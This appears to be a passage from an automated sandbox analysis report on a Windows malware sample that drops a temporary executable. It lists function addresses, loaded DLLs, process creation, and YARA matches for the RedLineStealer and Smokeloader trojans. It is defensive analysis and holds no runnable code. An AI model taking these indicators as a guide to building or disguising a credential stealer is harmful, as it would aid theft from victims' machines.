    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004270703_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043B8703_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004060003_2_00406000
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043080E3_2_0043080E
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043F8203_2_0043F820
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041D0C03_2_0041D0C0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004418A03_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041194F3_2_0041194F
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043F1503_2_0043F150
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042B1703_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004039003_2_00403900
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004251003_2_00425100
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004399233_2_00439923
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004271333_2_00427133
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004339303_2_00433930
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004121DB3_2_004121DB
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042A9F73_2_0042A9F7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040E9B03_2_0040E9B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041825B3_2_0041825B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042EA623_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040CA623_2_0040CA62
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00442A603_2_00442A60
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041DAD03_2_0041DAD0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00429ADE3_2_00429ADE
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00425AF03_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004092A03_2_004092A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00405AB03_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004042B03_2_004042B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043CB403_2_0043CB40
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042EB5F3_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004083603_2_00408360
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00428B673_2_00428B67
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00437B693_2_00437B69
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00402B203_2_00402B20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00441B203_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00432B243_2_00432B24
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004063C03_2_004063C0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042DBF03_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004223803_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041BBA03_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042BBA03_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042EBA13_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042EBB33_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00441BB03_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00441C403_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004424703_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00426C763_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041D4003_2_0041D400
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041C4003_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004174053_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00414C203_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004324263_2_00432426
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004284373_2_00428437
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043443D3_2_0043443D
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004354C43_2_004354C4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00434CEF3_2_00434CEF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043A4EF3_2_0043A4EF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004374AB3_2_004374AB
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041DCB03_2_0041DCB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043ACB03_2_0043ACB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0042FCBC3_2_0042FCBC
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040D5453_2_0040D545
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00425D6A3_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00435D133_2_00435D13
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00442D203_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043CD273_2_0043CD27
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00420D903_2_00420D90
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043C5A03_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00421E703_2_00421E70
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004366103_2_00436610
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004076203_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040AE303_2_0040AE30
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041F6D03_2_0041F6D0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00416ED03_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041BEE13_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00402EF03_2_00402EF0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004186FC3_2_004186FC
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00423EFF3_2_00423EFF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00431E8E3_2_00431E8E
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041A6903_2_0041A690
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004157203_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0041AF243_2_0041AF24
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00427F303_2_00427F30
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040DFE23_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004257E03_2_004257E0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00429FE43_2_00429FE4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0040CFEC3_2_0040CFEC
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004097903_2_00409790
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_004427B03_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00441FB03_2_00441FB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C20173_2_005C2017
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A20D73_2_005A20D7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B20F53_2_005B20F5
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058B0973_2_0058B097
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A60B73_2_005A60B7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005831573_2_00583157
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059C1483_2_0059C148
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A41663_2_005A4166
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A81973_2_005A8197
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059B18B3_2_0059B18B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058D2533_2_0058D253
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058E2493_2_0058E249
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005862673_2_00586267
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AA3053_2_005AA305
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059D3273_2_0059D327
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A73B23_2_005A73B2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BF3B73_2_005BF3B7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005924423_2_00592442
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005984C23_2_005984C2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005845173_2_00584517
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005895073_2_00589507
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005885C73_2_005885C7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A25E73_2_005A25E7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059D6673_2_0059D667
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059C6673_2_0059C667
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005866273_2_00586627
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C26D73_2_005C26D7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B268D3_2_005B268D
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B46A43_2_005B46A4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BA7563_2_005BA756
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B77123_2_005B7712
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B572B3_2_005B572B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058D7AC3_2_0058D7AC
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B68773_2_005B6877
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BC8073_2_005BC807
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059A8F73_2_0059A8F7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005878873_2_00587887
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059F9373_2_0059F937
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005899F73_2_005899F7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B0A753_2_005B0A75
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C2A173_2_005C2A17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BBAD73_2_005BBAD7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00597AE43_2_00597AE4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00588AE73_2_00588AE7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BFA873_2_005BFA87
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00586AB73_2_00586AB7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00599AA73_2_00599AA7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00583B673_2_00583B67
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B3B973_2_005B3B97
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B9B8A3_2_005B9B8A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00591BB63_2_00591BB6
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058EC173_2_0058EC17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0058CCC93_2_0058CCC9
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AECC93_2_005AECC9
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C2CC73_2_005C2CC7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00585D173_2_00585D17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059DD373_2_0059DD37
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B7DD03_2_005B7DD0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AEDC63_2_005AEDC6
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B2D8B3_2_005B2D8B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00582D873_2_00582D87
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BCDA73_2_005BCDA7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005ADE573_2_005ADE57
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AEE1A3_2_005AEE1A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AEE083_2_005AEE08
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005ABE073_2_005ABE07
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00594E873_2_00594E87
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B4F563_2_005B4F56
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005B5F7A3_2_005B5F7A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005BAF173_2_005BAF17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0059DF173_2_0059DF17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005AFF233_2_005AFF23
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_00597FFA3_2_00597FFA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005A0FF73_2_005A0FF7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_005C2F873_2_005C2F87
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: String function: 00414C10 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: String function: 00594E77 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: String function: 00408170 appears 45 times
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: String function: 005883D7 appears 77 times
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: String function: 02150977 appears 53 times
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: String function: 00410710 appears 53 times
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: String function: 0040FDA8 appears 125 times
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: String function: 0215000F appears 121 times
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: String function: 0040F8F9 appears 36 times
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 1004
    Source: lBb4XI4eGD.exeBinary or memory string: OriginalFileName vs lBb4XI4eGD.exe
    Source: lBb4XI4eGD.exe, 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs lBb4XI4eGD.exe
    Source: lBb4XI4eGD.exe, 00000000.00000003.1520436002.00000000021B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs lBb4XI4eGD.exe
    Source: lBb4XI4eGD.exe, 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs lBb4XI4eGD.exe
    Source: lBb4XI4eGD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: lBb4XI4eGD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: E6F4.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/3
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00783DC6 CreateToolhelp32Snapshot,Module32First,0_2_00783DC6
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,3_2_0043B870
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4052
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile created: C:\Users\user\AppData\Local\Temp\E6F4.tmpJump to behavior
    Source: lBb4XI4eGD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: lBb4XI4eGD.exeVirustotal: Detection: 40%
    Source: lBb4XI4eGD.exeReversingLabs: Detection: 50%
    Source: unknownProcess created: C:\Users\user\Desktop\lBb4XI4eGD.exe "C:\Users\user\Desktop\lBb4XI4eGD.exe"
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeProcess created: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe "C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe"
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 1004
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeProcess created: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe "C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeSection loaded: sppc.dllJump to behavior
